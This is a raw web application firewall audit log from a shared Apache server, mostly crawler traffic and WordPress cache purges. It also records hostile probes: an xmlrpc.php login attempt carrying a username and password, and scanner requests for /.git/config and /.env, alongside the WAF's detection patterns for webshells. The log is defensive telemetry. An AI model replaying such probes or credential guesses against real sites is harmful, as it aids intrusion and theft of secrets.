X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0b5b1f00-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323969971200 1645630 (- - -) Stopwatch2: 1751323969971200 1645630; combined=2188, p1=86, p2=1919, p3=0, p4=0, p5=183, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0b5b1f00-Z-- --e9ebca7d-A-- [01/Jul/2025:04:22:52.742550 +0530] aGMVROTp8IZEWNkIVLLSpAAAABo 20.171.207.232 47240 192.168.74.40 443 --e9ebca7d-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/aainag/images/Rajasthan-Travel-Guides/hotels-Mount-Abu.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e9ebca7d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323972728362 14388 (- - -) Stopwatch2: 1751323972728362 14388; combined=2917, p1=125, p2=2672, p3=0, p4=0, p5=120, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e9ebca7d-Z-- --21d91419-A-- [01/Jul/2025:04:22:52.852761 +0530] aGMVQ_9EZv1_DBVMumTd6QAAAA0 103.185.74.40 14508 192.168.74.40 443 --21d91419-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --21d91419-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --21d91419-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323971828557 1024621 (- - -) Stopwatch2: 1751323971828557 1024621; combined=2326, p1=101, p2=2107, p3=0, p4=0, p5=117, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --21d91419-Z-- --b7496a5f-A-- [01/Jul/2025:04:22:53.951056 +0530] aGMVReTp8IZEWNkIVLLSpQAAABo 20.171.207.232 47240 192.168.74.40 443 --b7496a5f-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/js/Rajasthan-Travel-Guides/aainag/aainag/https/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b7496a5f-F-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --02eb151a-Z-- --03a6d30a-A-- [01/Jul/2025:04:34:48.466816 +0530] aGMYEEd1D9b-FQbCkIxvnAAAACM 43.157.170.126 39974 192.168.74.40 80 --03a6d30a-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --03a6d30a-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --03a6d30a-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751324688456949 10397 (- - -) Stopwatch2: 1751324688456949 10397; combined=6100, p1=203, p2=5527, p3=154, p4=2, p5=213, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --03a6d30a-Z-- --b1135509-A-- [01/Jul/2025:04:34:49.434411 +0530] aGMYESEe3SaLIRqvXn3XUgAAAA4 20.171.207.232 58906 192.168.74.40 443 --b1135509-B-- GET /https/aainag/images/testimonials/https/js/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/Jaisalmer-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b1135509-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b1135509-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/images/testimonials/https/js/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/Jaisalmer-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326980463001 17226 (- - -) Stopwatch2: 1751326980463001 17226; combined=3622, p1=170, p2=3308, p3=0, p4=0, p5=144, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9760d60b-Z-- --ee8b4f22-A-- [01/Jul/2025:05:13:00.717279 +0530] aGMhAy-UNe2XKzId6FX_QAAAABQ 103.185.74.40 28188 192.168.74.40 443 --ee8b4f22-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --ee8b4f22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ee8b4f22-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326979530243 1187711 (- - -) Stopwatch2: 1751326979530243 1187711; combined=2299, p1=100, p2=2032, p3=0, p4=0, p5=166, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ee8b4f22-Z-- --b5493d32-A-- [01/Jul/2025:05:13:01.681677 +0530] aGMhBUCdC-9uZ5gLti8M3wAAAAU 20.171.207.232 33884 192.168.74.40 443 --b5493d32-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/images/js/Rajasthan-Travel-Guides/https/aaina/1/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b5493d32-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326981843745 17069 (- - -) Stopwatch2: 1751326981843745 17069; combined=3944, p1=533, p2=3246, p3=0, p4=0, p5=165, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3a8b200b-Z-- --ac36076e-A-- [01/Jul/2025:05:13:02.078064 +0530] aGMhBHDXYcRntxraQPA_YAAAABY 103.185.74.40 37324 192.168.74.40 443 --ac36076e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --ac36076e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ac36076e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326980931940 1146933 (- - -) Stopwatch2: 1751326980931940 1146933; combined=2298, p1=91, p2=2000, p3=0, p4=0, p5=207, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ac36076e-Z-- --83bd6f07-A-- [01/Jul/2025:05:13:02.877591 +0530] aGMhBkCdC-9uZ5gLti8M4AAAAAU 20.171.207.232 33884 192.168.74.40 443 --83bd6f07-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/images/js/Rajasthan-Travel-Guides/https/aaina/1/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --83bd6f07-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327086651479 14661 (- - -) Stopwatch2: 1751327086651479 14661; combined=3252, p1=127, p2=3002, p3=0, p4=0, p5=122, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --33d57719-Z-- --b25ce602-A-- [01/Jul/2025:05:14:48.097313 +0530] aGMhbi8ql_RkmkmikEjGZQAAAAo 103.185.74.40 2197 192.168.74.40 443 --b25ce602-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b25ce602-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b25ce602-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327086937011 1160758 (- - -) Stopwatch2: 1751327086937011 1160758; combined=2131, p1=115, p2=1816, p3=0, p4=0, p5=200, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b25ce602-Z-- --57760d22-A-- [01/Jul/2025:05:14:49.572693 +0530] aGMhcAsE3OEvYP7qC5bcKwAAAAQ 103.185.74.40 43076 192.168.74.40 443 --57760d22-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --57760d22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --57760d22-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327088310584 1262472 (- - -) Stopwatch2: 1751327088310584 1262472; combined=2153, p1=103, p2=1900, p3=0, p4=0, p5=150, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --57760d22-Z-- --2d1ba232-A-- [01/Jul/2025:05:14:51.831852 +0530] aGMhccOVmx8tBrnWNrtvNAAAAAw 8.218.212.177 53208 192.168.74.40 80 --2d1ba232-B-- POST /xmlrpc.php HTTP/1.1 Host: sritelugu.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Content-Length: 230 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, zstd, deflate, br Accept-Language: he-IL,he;q=0.9 Content-Type: application/xml Referer: http://sritelugu.com --2d1ba232-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>sriteluguastro</string></value></param><param><value><string>sriteluguastro@123</string></value></param></params></methodCall> --2d1ba232-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.0.28 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a201c941-Z-- --3f052269-A-- [01/Jul/2025:05:17:46.261773 +0530] aGMiIi8ql_RkmkmikEjGkQAAAAo 167.99.81.70 38604 192.168.74.40 443 --3f052269-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --3f052269-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3f052269-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327266219304 42656 (- - -) Stopwatch2: 1751327266219304 42656; combined=3367, p1=101, p2=3117, p3=0, p4=0, p5=149, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3f052269-Z-- --0b96f374-A-- [01/Jul/2025:05:17:46.553892 +0530] aGMiIt7RqqsV2xX5nMS5PQAAACY 20.171.207.232 40644 192.168.74.40 443 --0b96f374-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/images/aainag/Rajasthan-Travel-Guides/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0b96f374-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0b96f374-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/images/aainag/Rajasthan-Travel-Guides/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/images/aainag/Rajasthan-Travel-Guides/luxury-mini-buses-coaches.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327266537169 16909 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0b96f374-Z-- --b524c57d-A-- [01/Jul/2025:05:17:47.279225 +0530] aGMiI4dPpucRv_12QtD47QAAAAk 167.99.81.70 47108 192.168.74.40 443 --b524c57d-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --b524c57d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --b524c57d-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327267241699 37830 (- - -) Stopwatch2: 1751327267241699 37830; combined=670, p1=78, p2=448, p3=0, p4=0, p5=143, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b524c57d-Z-- --ac003d72-A-- [01/Jul/2025:05:17:47.799099 +0530] aGMiI97RqqsV2xX5nMS5PgAAACY 20.171.207.232 40644 192.168.74.40 443 --ac003d72-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ac003d72-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ac003d72-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327267732093 67311 (- - -) Stopwatch2: 1751327267732093 67311; combined=2722, p1=159, p2=2418, p3=0, p4=0, p5=144, sr=55, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --41987e2c-Z-- --fb742306-A-- [01/Jul/2025:05:25:35.191049 +0530] aGMj9wfrbmM1v3nD-8VJRwAAABo 165.22.97.213 36802 192.168.74.40 80 --fb742306-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 TE: Trailers --fb742306-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --fb742306-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751327735187319 5169 (- - -) Stopwatch2: 1751327735187319 5169; combined=1034, p1=132, p2=539, p3=0, p4=0, p5=363, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --fb742306-Z-- --86ad7a41-A-- [01/Jul/2025:05:25:36.334195 +0530] aGMj-BBa0N-Z4nT7y60emwAAABk 20.171.207.232 57078 192.168.74.40 443 --86ad7a41-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-ahmedabad/https/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --86ad7a41-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --86ad7a41-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330693051432 25049 (- - -) Stopwatch2: 1751330693051432 25049; combined=3317, p1=121, p2=3047, p3=0, p4=0, p5=149, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --45f2b861-Z-- --0c0d8074-A-- [01/Jul/2025:06:14:54.145461 +0530] 